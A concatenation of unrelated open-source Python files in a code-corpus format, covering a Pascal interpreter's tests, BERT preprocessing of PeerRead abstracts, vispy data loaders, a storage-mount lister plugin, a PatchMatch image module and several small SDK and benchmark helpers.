from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 5 + b;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.ID_NOT_FOUND)
self.assertEqual(the_exception.token.value, 'b')
class TestCallStack:
def __init__(self):
self._records = []
def push(self, ar):
self._records.append(ar)
def pop(self):
# do nothing
pass
def peek(self):
return self._records[-1]
class InterpreterTestCase(unittest.TestCase):
def makeInterpreter(self, text):
from spi import Lexer, Parser, SemanticAnalyzer, Interpreter
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
interpreter = Interpreter(tree)
interpreter.call_stack = TestCallStack()
return interpreter
def test_integer_arithmetic_expressions(self):
for expr, result in (
('3', 3),
('2 + 7 * 4', 30),
('7 - 8 DIV 4', 5),
('14 + 2 * 3 - 6 DIV 2', 17),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1))', 22),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1)) DIV (2 + 3) - 5 - 3 + (8)', 10),
('7 + (((3 + 2)))', 12),
('- 3', -3),
('+ 3', 3),
('5 - - - + - 3', 8),
('5 - - - + - (3 + 4) - +2', 10),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_float_arithmetic_expressions(self):
for expr, result in (
('3.14', 3.14),
('2.14 + 7 * 4', 30.14),
('7.14 - 8 / 4', 5.14),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : REAL;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_procedure_call(self):
text = """\
program Main;
procedure Alpha(a : integer; b : integer);
var x : integer;
begin
x := (a + b ) * 2;
end;
begin { Main }
Alpha(3 + 5, 7);
end. { Main }
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], 8)
self.assertEqual(ar['b'], 7)
self.assertEqual(ar['x'], 30)
self.assertEqual(ar.nesting_level, 2)
def test_program(self):
text = """\
PROGRAM Part12;
VAR
number : INTEGER;
a, b : INTEGER;
y : REAL;
PROCEDURE P1;
VAR
a : REAL;
k : INTEGER;
PROCEDURE P2;
VAR
a, z : INTEGER;
BEGIN {P2}
z := 777;
END; {P2}
BEGIN {P1}
END; {P1}
BEGIN {Part12}
number := 2;
a := number ;
b := 10 * a + 10 * number DIV 4;
y := 20 / 7 + 3.14
END. {Part12}
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(len(ar.members.keys()), 4)
self.assertEqual(ar['number'], 2)
self.assertEqual(ar['a'], 2)
self.assertEqual(ar['b'], 25)
self.assertAlmostEqual(ar['y'], float(20) / 7 + 3.14) # 5.9971...
if __name__ == '__main__':
unittest.main()
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py | dveni/causal-text-embeddings | 114 | 9248 | <filename>src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
"""
Simple pre-processing for PeerRead papers.
Takes in JSON formatted data from ScienceParse and outputs a tfrecord
Reference example:
https://github.com/tensorlayer/tensorlayer/blob/9528da50dfcaf9f0f81fba9453e488a1e6c8ee8f/examples/data_process/tutorial_tfrecord3.py
"""
import argparse
import glob
import os
import random
import io
import json
from dateutil.parser import parse as parse_date
import tensorflow as tf
import bert.tokenization as tokenization
from PeerRead.ScienceParse.Paper import Paper
from PeerRead.ScienceParse.ScienceParseReader import ScienceParseReader
from PeerRead.data_cleaning.PeerRead_hand_features import get_PeerRead_hand_features
rng = random.Random(0)
def process_json_paper(paper_json_filename, scienceparse_dir, tokenizer):
paper = Paper.from_json(paper_json_filename)
paper.SCIENCEPARSE = ScienceParseReader.read_science_parse(paper.ID, paper.TITLE, paper.ABSTRACT,
scienceparse_dir)
# tokenize PeerRead features
try:
title_tokens = tokenizer.tokenize(paper.TITLE)
    except ValueError: # missing titles are quite common in sciparse
print("Missing title for " + paper_json_filename)
title_tokens = None
abstract_tokens = tokenizer.tokenize(paper.ABSTRACT)
text_features = {'title': title_tokens,
'abstract': abstract_tokens}
context_features = {'authors': paper.AUTHORS,
'accepted': paper.ACCEPTED,
'name': paper.ID}
# add hand crafted features from PeerRead
pr_hand_features = get_PeerRead_hand_features(paper)
context_features.update(pr_hand_features)
return text_features, context_features
def bert_process_sentence(example_tokens, max_seq_length, tokenizer):
"""
Tokenization and pre-processing of text as expected by Bert
Parameters
----------
example_tokens
max_seq_length
tokenizer
Returns
-------
"""
# Account for [CLS] and [SEP] with "- 2"
if len(example_tokens) > max_seq_length - 2:
example_tokens = example_tokens[0:(max_seq_length - 2)]
# The convention in BERT for single sequences is:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. (vv: Not relevant for us)
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
# vv: segment_ids seem to be the same as type_ids
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in example_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
return input_ids, input_mask, segment_ids
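# Illustrative sketch (hypothetical values): with max_seq_length=8 and
# example_tokens=["the", "dog", "barks"], bert_process_sentence returns
#
#   input_ids   -> ids for [CLS] the dog barks [SEP], zero-padded to length 8
#   input_mask  -> [1, 1, 1, 1, 1, 0, 0, 0]
#   segment_ids -> [0, 0, 0, 0, 0, 0, 0, 0]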
def paper_to_bert_Example(text_features, context_features, max_seq_length, tokenizer):
"""
Parses the input paper into a tf.Example as expected by Bert
Note: the docs for tensorflow Example are awful ¯\_(ツ)_/¯
"""
abstract_features = {}
abstract_tokens, abstract_padding_mask, _ = \
bert_process_sentence(text_features['abstract'], max_seq_length, tokenizer)
abstract_features["token_ids"] = _int64_feature(abstract_tokens)
abstract_features["token_mask"] = _int64_feature(abstract_padding_mask)
    # abstract_features["segment_ids"] = create_int_feature(feature.segment_ids) TODO: omission may cause bugs
# abstract_features["label_ids"] = _int64_feature([feature.label_id])
# non-sequential features
tf_context_features, tf_context_features_types = _dict_of_nonlist_numerical_to_tf_features(context_features)
features = {**tf_context_features, **abstract_features}
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
return tf_example
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
else:
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _float_feature(value):
"""Wrapper for inserting a float Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
else:
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto,
e.g, an image in byte
"""
# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _dict_of_nonlist_numerical_to_tf_features(my_dict):
"""
Strip out non-numerical features
Returns tf_features_dict: a dictionary suitable for passing to tf.train.example
tf_types_dict: a dictionary of the tf types of previous dict
"""
tf_types_dict = {}
tf_features_dict = {}
for k, v in my_dict.items():
if isinstance(v, int) or isinstance(v, bool):
tf_features_dict[k] = _int64_feature(v)
tf_types_dict[k] = tf.int64
elif isinstance(v, float):
tf_features_dict[k] = _float_feature(v)
tf_types_dict[k] = tf.float32
else:
pass
return tf_features_dict, tf_types_dict
venues = {'acl': 1,
'conll': 2,
'iclr': 3,
'nips': 4,
'icml': 5,
'emnlp': 6,
'aaai': 7,
'hlt-naacl': 8,
'arxiv': 0}
def _venues(venue_name):
if venue_name.lower() in venues:
return venues[venue_name.lower()]
else:
return -1
def _arxiv_subject(subjects):
subject = subjects[0]
if 'lg' in subject.lower():
return 0
elif 'cl' in subject.lower():
return 1
elif 'ai' in subject.lower():
return 2
else:
raise Exception("arxiv subject not recognized")
def clean_PeerRead_dataset(review_json_dir, parsedpdf_json_dir,
venue, year,
out_dir, out_file,
max_abs_len, tokenizer,
default_accept=1,
is_arxiv = False):
if not os.path.exists(out_dir):
os.makedirs(out_dir)
print('Reading reviews from...', review_json_dir)
paper_json_filenames = sorted(glob.glob('{}/*.json'.format(review_json_dir)))
with tf.python_io.TFRecordWriter(out_dir + "/" + out_file) as writer:
for idx, paper_json_filename in enumerate(paper_json_filenames):
text_features, context_features = process_json_paper(paper_json_filename, parsedpdf_json_dir, tokenizer)
if context_features['accepted'] is None: # missing for conferences other than ICLR (we only see accepts)
context_features['accepted'] = default_accept
many_split = rng.randint(0, 100) # useful for easy data splitting later
# other context features
arxiv = -1
if is_arxiv:
with io.open(paper_json_filename) as json_file:
loaded = json.load(json_file)
year = parse_date(loaded['DATE_OF_SUBMISSION']).year
venue = _venues(loaded['conference'])
arxiv = _arxiv_subject([loaded['SUBJECTS']])
extra_context = {'id': idx, 'venue': venue, 'year': year, 'many_split': many_split,
'arxiv': arxiv}
context_features.update(extra_context)
# turn it into a tf.data example
paper_ex = paper_to_bert_Example(text_features, context_features,
max_seq_length=max_abs_len, tokenizer=tokenizer)
writer.write(paper_ex.SerializeToString())
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--review-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/reviews')
parser.add_argument('--parsedpdf-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/parsed_pdfs')
parser.add_argument('--out-dir', type=str, default='../dat/PeerRead/proc')
parser.add_argument('--out-file', type=str, default='arxiv-all.tf_record')
parser.add_argument('--vocab-file', type=str, default='../../bert/pre-trained/uncased_L-12_H-768_A-12/vocab.txt')
parser.add_argument('--max-abs-len', type=int, default=250)
parser.add_argument('--venue', type=int, default=0)
parser.add_argument('--year', type=int, default=2017)
args = parser.parse_args()
tokenizer = tokenization.FullTokenizer(
vocab_file=args.vocab_file, do_lower_case=True)
clean_PeerRead_dataset(args.review_json_dir, args.parsedpdf_json_dir,
args.venue, args.year,
args.out_dir, args.out_file,
args.max_abs_len, tokenizer, is_arxiv=True)
if __name__ == "__main__":
main()
|
vispy/io/datasets.py | hmaarrfk/vispy | 2,617 | 9274 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from os import path as op
from ..util import load_data_file
# This is the package data dir, not the dir for config, etc.
DATA_DIR = op.join(op.dirname(__file__), '_data')
def load_iris():
"""Load the iris dataset
Returns
-------
iris : NpzFile
data['data'] : a (150, 4) NumPy array with the iris' features
data['group'] : a (150,) NumPy array with the iris' group
"""
return np.load(load_data_file('iris/iris.npz',
force_download='2014-09-04'))
def load_crate():
"""Load an image of a crate
Returns
-------
crate : array
256x256x3 crate image.
"""
return np.load(load_data_file('orig/crate.npz'))['crate']
def pack_unit(value):
"""Packs float values between [0,1] into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
pack = np.zeros(value.shape + (4,), dtype=np.ubyte)
for i in range(4):
value, pack[..., i] = np.modf(value * 256.)
return pack
def pack_ieee(value):
"""Packs float ieee binary representation into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
    return np.frombuffer(value.tobytes(),
np.ubyte).reshape((value.shape + (4,)))
def load_spatial_filters(packed=True):
"""Load spatial-filters kernel
Parameters
----------
packed : bool
Whether or not the data should be in "packed" representation
for use in GLSL code.
Returns
-------
kernel : array
16x1024x4 (packed float in rgba) or
16x1024 (unpacked float)
16 interpolation kernel with length 1024 each.
names : tuple of strings
Respective interpolation names, plus "Nearest" which does
not require a filter but can still be used
"""
names = ("Bilinear", "Hanning", "Hamming", "Hermite",
"Kaiser", "Quadric", "Bicubic", "CatRom",
"Mitchell", "Spline16", "Spline36", "Gaussian",
"Bessel", "Sinc", "Lanczos", "Blackman", "Nearest")
kernel = np.load(op.join(DATA_DIR, 'spatial-filters.npy'))
if packed:
# convert the kernel to a packed representation
kernel = pack_unit(kernel)
return kernel, names
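# Usage sketch (illustrative only):
#
#   kernel, names = load_spatial_filters(packed=True)
#
# `kernel` has shape (16, 1024, 4) (each float packed into 4 unsigned bytes);
# with packed=False it is the raw (16, 1024) float kernel. `names` holds 17
# entries because "Nearest" needs no filter kernel.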
|
plugin/DataExport/extend.py | konradotto/TS | 125 | 9281 | #!/usr/bin/python
# Copyright (C) 2015 Ion Torrent Systems, Inc. All Rights Reserved
import subprocess
import re
pluginName = 'DataExport'
pluginDir = ""
networkFS = ["nfs", "cifs"]
localFS = ["ext4", "ext3", "xfs", "ntfs", "exfat", "vboxsf"]
supportedFS = ",".join(localFS + networkFS)
def test(bucket):
return bucket
def runProcess(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return iter(p.stdout.readline, b'')
def runProcessAndReturnLastLine(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.stdout.readlines()[-1]
def backupDevices(bucket):
devices = ""
cmd = "mount -l -t " + supportedFS
for line in runProcess(cmd.split()):
line_arr = line.split()
folder = line_arr[2]
fstype = line_arr[4]
perms = line_arr[5]
if perms.find('w') != -1:
use = True
if fstype in localFS:
m = re.match('^(/media|/mnt)', folder)
if not m:
use = False
if use:
cmd2 = "df -h %s " % folder
df = runProcessAndReturnLastLine(cmd2.split())
avail = df.split()[2]
devices = devices + "<OPTION VALUE=\"" + folder + "\">" + folder + " (" + avail + " free, " + fstype + ")</option>"
return devices
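# Illustrative sketch (hypothetical `mount -l` line): an entry such as
#
#   /dev/sdb1 on /media/backup type ext4 (rw,relatime)
#
# is kept because its options contain 'w', its fstype is in localFS and the
# mount point is under /media; the emitted option then looks like
#   <OPTION VALUE="/media/backup">/media/backup (12G free, ext4)</option>
# with the size field taken from `df -h /media/backup`.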
|
amlb/benchmarks/file.py | pplonski/automlbenchmark | 282 | 9293 | <filename>amlb/benchmarks/file.py<gh_stars>100-1000
import logging
import os
from typing import List, Tuple, Optional
from amlb.utils import config_load, Namespace
log = logging.getLogger(__name__)
def _find_local_benchmark_definition(name: str, benchmark_definition_dirs: List[str]) -> str:
# 'name' should be either a full path to the benchmark,
# or a filename (without extension) in the benchmark directory.
if os.path.exists(name):
return name
for bd in benchmark_definition_dirs:
bf = os.path.join(bd, f"{name}.yaml")
if os.path.exists(bf):
# We don't account for duplicate definitions (yet).
return bf
# should we support s3 and check for s3 path before raising error?
raise ValueError(f"Incorrect benchmark name or path `{name}`, name not available in {benchmark_definition_dirs}.")
def load_file_benchmark(name: str, benchmark_definition_dirs: List[str]) -> Tuple[str, Optional[str], List[Namespace]]:
""" Loads benchmark from a local file. """
benchmark_file = _find_local_benchmark_definition(name, benchmark_definition_dirs)
log.info("Loading benchmark definitions from %s.", benchmark_file)
tasks = config_load(benchmark_file)
benchmark_name, _ = os.path.splitext(os.path.basename(benchmark_file))
return benchmark_name, benchmark_file, tasks
|
test/manual/documents/test_iter_documents.py | membranepotential/mendeley-python-sdk | 103 | 9305 | <gh_stars>100-1000
from itertools import islice
from test import get_user_session, cassette
from test.resources.documents import delete_all_documents, create_document
def test_should_iterate_through_documents():
session = get_user_session()
delete_all_documents()
with cassette('fixtures/resources/documents/iter_documents/iterate_through_documents.yaml'):
create_document(session, 'title 1')
create_document(session, 'title 2')
create_document(session, 'title 3')
docs = list(islice(session.documents.iter(page_size=2), 3))
assert len(docs) == 3
assert docs[0].title == 'title 1'
assert docs[1].title == 'title 2'
assert docs[2].title == 'title 3'
|
src/exabgp/bgp/message/update/attribute/bgpls/link/mplsmask.py | pierky/exabgp | 1,560 | 9319 | # encoding: utf-8
"""
mplsmask.py
Created by <NAME> on 2016-12-01.
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
"""
from exabgp.bgp.message.notification import Notify
from exabgp.bgp.message.update.attribute.bgpls.linkstate import LinkState
from exabgp.bgp.message.update.attribute.bgpls.linkstate import FlagLS
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |L|R| Reserved |
# +-+-+-+-+-+-+-+-+
# https://tools.ietf.org/html/rfc7752#section-3.3.2.2 MPLS Protocol Mask
#
# +------------+------------------------------------------+-----------+
# | Bit | Description | Reference |
# +------------+------------------------------------------+-----------+
# | 'L' | Label Distribution Protocol (LDP) | [RFC5036] |
# | 'R' | Extension to RSVP for LSP Tunnels | [RFC3209] |
# | | (RSVP-TE) | |
# | 'Reserved' | Reserved for future use | |
# +------------+------------------------------------------+-----------+
# RFC 7752 3.3.2.2. MPLS Protocol Mask TLV
@LinkState.register()
class MplsMask(FlagLS):
REPR = 'MPLS Protocol mask'
JSON = 'mpls-mask'
TLV = 1094
FLAGS = ['LDP', 'RSVP-TE', 'RSV', 'RSV', 'RSV', 'RSV', 'RSV', 'RSV']
LEN = 1
|
image_analogy/losses/patch_matcher.py | kaldap/image-analogies | 3,722 | 9327 | import numpy as np
import scipy.interpolate
import scipy.ndimage
from sklearn.feature_extraction.image import extract_patches_2d, reconstruct_from_patches_2d
def _calc_patch_grid_dims(shape, patch_size, patch_stride):
x_w, x_h, x_c = shape
num_rows = 1 + (x_h - patch_size) // patch_stride
num_cols = 1 + (x_w - patch_size) // patch_stride
return num_rows, num_cols
def make_patch_grid(x, patch_size, patch_stride=1):
'''x shape: (num_channels, rows, cols)'''
x = x.transpose(2, 1, 0)
patches = extract_patches_2d(x, (patch_size, patch_size))
x_w, x_h, x_c = x.shape
num_rows, num_cols = _calc_patch_grid_dims(x.shape, patch_size, patch_stride)
patches = patches.reshape((num_rows, num_cols, patch_size, patch_size, x_c))
patches = patches.transpose((0, 1, 4, 2, 3))
#patches = np.rollaxis(patches, -1, 2)
return patches
def combine_patches_grid(in_patches, out_shape):
'''Reconstruct an image from these `patches`
input shape: (rows, cols, channels, patch_row, patch_col)
'''
num_rows, num_cols = in_patches.shape[:2]
num_channels = in_patches.shape[-3]
patch_size = in_patches.shape[-1]
num_patches = num_rows * num_cols
in_patches = np.reshape(in_patches, (num_patches, num_channels, patch_size, patch_size)) # (patches, channels, pr, pc)
in_patches = np.transpose(in_patches, (0, 2, 3, 1)) # (patches, p, p, channels)
recon = reconstruct_from_patches_2d(in_patches, out_shape)
return recon.transpose(2, 1, 0).astype(np.float32)
class PatchMatcher(object):
'''A matcher of image patches inspired by the PatchMatch algorithm.
image shape: (width, height, channels)
'''
def __init__(self, input_shape, target_img, patch_size=1, patch_stride=1, jump_size=0.5,
num_propagation_steps=5, num_random_steps=5, random_max_radius=1.0, random_scale=0.5):
self.input_shape = input_shape
self.patch_size = patch_size
self.patch_stride = patch_stride
self.jump_size = jump_size
self.num_propagation_steps = num_propagation_steps
self.num_random_steps = num_random_steps
self.random_max_radius = random_max_radius
self.random_scale = random_scale
self.num_input_rows, self.num_input_cols = _calc_patch_grid_dims(input_shape, patch_size, patch_stride)
self.target_patches = make_patch_grid(target_img, patch_size)
self.target_patches_normed = self.normalize_patches(self.target_patches)
self.coords = np.random.uniform(0.0, 1.0, # TODO: switch to pixels
(2, self.num_input_rows, self.num_input_cols))# * [[[self.num_input_rows]],[[self.num_input_cols]]]
self.similarity = np.zeros(input_shape[:2:-1], dtype=np.float32)
self.min_propagration_row = 1.0 / self.num_input_rows
self.min_propagration_col = 1.0 / self.num_input_cols
self.delta_row = np.array([[[self.min_propagration_row]], [[0.0]]])
self.delta_col = np.array([[[0.0]], [[self.min_propagration_col]]])
def update(self, input_img, reverse_propagation=False):
input_patches = self.get_patches_for(input_img)
self.update_with_patches(self.normalize_patches(input_patches), reverse_propagation=reverse_propagation)
def update_with_patches(self, input_patches, reverse_propagation=False):
self._propagate(input_patches, reverse_propagation=reverse_propagation)
self._random_update(input_patches)
def get_patches_for(self, img):
        return make_patch_grid(img, self.patch_size)
def normalize_patches(self, patches):
norm = np.sqrt(np.sum(np.square(patches), axis=(2, 3, 4), keepdims=True))
return patches / norm
def _propagate(self, input_patches, reverse_propagation=False):
if reverse_propagation:
roll_direction = 1
else:
roll_direction = -1
sign = float(roll_direction)
for step_i in range(self.num_propagation_steps):
new_coords = self.clip_coords(np.roll(self.coords, roll_direction, 1) + self.delta_row * sign)
coords_row, similarity_row = self.eval_state(new_coords, input_patches)
new_coords = self.clip_coords(np.roll(self.coords, roll_direction, 2) + self.delta_col * sign)
coords_col, similarity_col = self.eval_state(new_coords, input_patches)
self.coords, self.similarity = self.take_best(coords_row, similarity_row, coords_col, similarity_col)
def _random_update(self, input_patches):
for alpha in range(1, self.num_random_steps + 1): # NOTE this should actually stop when the move is < 1
new_coords = self.clip_coords(self.coords + np.random.uniform(-self.random_max_radius, self.random_max_radius, self.coords.shape) * self.random_scale ** alpha)
self.coords, self.similarity = self.eval_state(new_coords, input_patches)
def eval_state(self, new_coords, input_patches):
new_similarity = self.patch_similarity(input_patches, new_coords)
delta_similarity = new_similarity - self.similarity
coords = np.where(delta_similarity > 0, new_coords, self.coords)
best_similarity = np.where(delta_similarity > 0, new_similarity, self.similarity)
return coords, best_similarity
def take_best(self, coords_a, similarity_a, coords_b, similarity_b):
delta_similarity = similarity_a - similarity_b
best_coords = np.where(delta_similarity > 0, coords_a, coords_b)
best_similarity = np.where(delta_similarity > 0, similarity_a, similarity_b)
return best_coords, best_similarity
def patch_similarity(self, source, coords):
'''Check the similarity of the patches specified in coords.'''
target_vals = self.lookup_coords(self.target_patches_normed, coords)
err = source * target_vals
return np.sum(err, axis=(2, 3, 4))
def clip_coords(self, coords):
# TODO: should this all be in pixel space?
coords = np.clip(coords, 0.0, 1.0)
return coords
def lookup_coords(self, x, coords):
x_shape = np.expand_dims(np.expand_dims(x.shape, -1), -1)
i_coords = np.round(coords * (x_shape[:2] - 1)).astype('int32')
return x[i_coords[0], i_coords[1]]
def get_reconstruction(self, patches=None, combined=None):
if combined is not None:
patches = make_patch_grid(combined, self.patch_size)
if patches is None:
patches = self.target_patches
patches = self.lookup_coords(patches, self.coords)
recon = combine_patches_grid(patches, self.input_shape)
return recon
def scale(self, new_shape, new_target_img):
'''Create a new matcher of the given shape and replace its
state with a scaled up version of the current matcher's state.
'''
new_matcher = PatchMatcher(new_shape, new_target_img, patch_size=self.patch_size,
patch_stride=self.patch_stride, jump_size=self.jump_size,
num_propagation_steps=self.num_propagation_steps,
num_random_steps=self.num_random_steps,
random_max_radius=self.random_max_radius,
random_scale=self.random_scale)
new_matcher.coords = congrid(self.coords, new_matcher.coords.shape, method='neighbour')
new_matcher.similarity = congrid(self.similarity, new_matcher.coords.shape, method='neighbour')
return new_matcher
def congrid(a, newdims, method='linear', centre=False, minusone=False):
'''Arbitrary resampling of source array to new dimension sizes.
Currently only supports maintaining the same number of dimensions.
To use 1-D arrays, first promote them to shape (x,1).
Uses the same parameters and creates the same co-ordinate lookup points
as IDL''s congrid routine, which apparently originally came from a VAX/VMS
routine of the same name.
method:
neighbour - closest value from original data
nearest and linear - uses n x 1-D interpolations using
scipy.interpolate.interp1d
(see Numerical Recipes for validity of use of n 1-D interpolations)
spline - uses ndimage.map_coordinates
centre:
True - interpolation points are at the centres of the bins
False - points are at the front edge of the bin
minusone:
For example- inarray.shape = (i,j) & new dimensions = (x,y)
False - inarray is resampled by factors of (i/x) * (j/y)
True - inarray is resampled by(i-1)/(x-1) * (j-1)/(y-1)
This prevents extrapolation one element beyond bounds of input array.
'''
    if a.dtype not in [np.float64, np.float32]:
        a = a.astype(float)
    m1 = int(minusone)
    ofs = int(centre) * 0.5
old = np.array( a.shape )
ndims = len( a.shape )
    if len(newdims) != ndims:
        print("[congrid] dimensions error. "
              "This routine currently only supports "
              "rebinning to the same number of dimensions.")
        return None
newdims = np.asarray( newdims, dtype=float )
dimlist = []
if method == 'neighbour':
for i in range( ndims ):
            base = np.indices(newdims.astype(int))[i]
dimlist.append( (old[i] - m1) / (newdims[i] - m1) \
* (base + ofs) - ofs )
cd = np.array( dimlist ).round().astype(int)
        newa = a[tuple(cd)]
return newa
elif method in ['nearest','linear']:
# calculate new dims
for i in range( ndims ):
base = np.arange( newdims[i] )
dimlist.append( (old[i] - m1) / (newdims[i] - m1) \
* (base + ofs) - ofs )
# specify old dims
        olddims = [np.arange(i, dtype=float) for i in list(a.shape)]
# first interpolation - for ndims = any
mint = scipy.interpolate.interp1d( olddims[-1], a, kind=method )
newa = mint( dimlist[-1] )
        trorder = [ndims - 1] + list(range(ndims - 1))
for i in range( ndims - 2, -1, -1 ):
newa = newa.transpose( trorder )
mint = scipy.interpolate.interp1d( olddims[i], newa, kind=method )
newa = mint( dimlist[i] )
if ndims > 1:
# need one more transpose to return to original dimensions
newa = newa.transpose( trorder )
return newa
elif method in ['spline']:
oslices = [ slice(0,j) for j in old ]
oldcoords = np.ogrid[oslices]
nslices = [ slice(0,j) for j in list(newdims) ]
newcoords = np.mgrid[nslices]
        newcoords_dims = list(range(newcoords.ndim))
        # make first index last
        newcoords_dims.append(newcoords_dims.pop(0))
newcoords_tr = newcoords.transpose(newcoords_dims)
# makes a view that affects newcoords
newcoords_tr += ofs
deltas = (np.asarray(old) - m1) / (newdims - m1)
newcoords_tr *= deltas
newcoords_tr -= ofs
newa = scipy.ndimage.map_coordinates(a, newcoords)
return newa
    else:
        print("Congrid error: Unrecognized interpolation type.\n"
              "Currently only 'neighbour', 'nearest', 'linear', "
              "and 'spline' are supported.")
        return None
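
def _congrid_demo():
    '''Hedged usage sketch (not part of the original module): downsample a
    (6, 6) array to (3, 3) with nearest-neighbour lookup. The shapes and
    values here are illustrative only.
    '''
    demo_src = np.arange(36, dtype=float).reshape(6, 6)
    demo_small = congrid(demo_src, (3, 3), method='neighbour')
    # picks every other row/column: [[0, 2, 4], [12, 14, 16], [24, 26, 28]]
    assert demo_small.shape == (3, 3)
    return demo_small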
if __name__ == '__main__':
import sys
import time
from scipy.misc import imsave
from image_analogy.img_utils import load_image, preprocess_image, deprocess_image
content_image_path, style_image_path, output_prefix = sys.argv[1:]
jump_size = 1.0
num_steps = 7
patch_size = 1
patch_stride = 1
feat_chans = 512
feat_style_shape = (feat_chans, 12, 18)
feat_style = np.random.uniform(0.0, 1.0, feat_style_shape)
feat_in_shape = (feat_chans, 17, 10)
feat_in = np.random.uniform(0.0, 1.0, feat_in_shape)
matcher = PatchMatcher(feat_in_shape[::-1], feat_style, patch_size=patch_size)
feat_in_normed = matcher.normalize_patches(matcher.get_patches_for(feat_in))
for i in range(num_steps):
matcher.update_with_patches(feat_in_normed)
r = matcher.get_reconstruction()
content_img_img = load_image(content_image_path)
content_n_channels, content_n_rows, content_n_cols = content_img_img.shape[::-1]
content_img = preprocess_image(content_img_img, content_n_cols, content_n_rows)[0]#.transpose((2,1,0))
style_img = load_image(style_image_path)
    style_n_channels, style_n_rows, style_n_cols = style_img.shape[::-1]
style_img = preprocess_image(
load_image(style_image_path), style_n_cols, style_n_rows)[0]#.transpose((2,1,0))
pg = make_patch_grid(content_img, patch_size)
result = combine_patches_grid(pg, content_img.shape[::-1])
outimg = deprocess_image(result, contrast_percent=0)
imsave(output_prefix + '_bestre.png', outimg)
# # #
matcher = PatchMatcher((content_n_cols, content_n_rows, content_n_channels), style_img, patch_size=patch_size)
for i in range(num_steps):
start = time.time()
matcher.update(content_img, reverse_propagation=bool(i % 2))
print(matcher.similarity.min(), matcher.similarity.max(), matcher.similarity.mean())
end = time.time()
#print end-start
start = time.time()
result = matcher.get_reconstruction(patches=matcher.target_patches)
print(result.shape)
end = time.time()
print(end-start)
outimg = deprocess_image(result, contrast_percent=0)
# # imsave takes (rows, cols, channels)
imsave(output_prefix + '_best.png', outimg)
|
vnpy/gateway/rohon/__init__.py | funrunskypalace/vnpy | 323 | 9333 | from .rohon_gateway import RohonGateway
|
tests/unit/sagemaker/tensorflow/test_estimator_init.py | LastRemote/sagemaker-python-sdk | 1,690 | 9348 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
from mock import Mock, patch
from packaging import version
import pytest
from sagemaker.tensorflow import TensorFlow
REGION = "us-west-2"
ENV_INPUT = {"env_key1": "env_val1", "env_key2": "env_val2", "env_key3": "env_val3"}
@pytest.fixture()
def sagemaker_session():
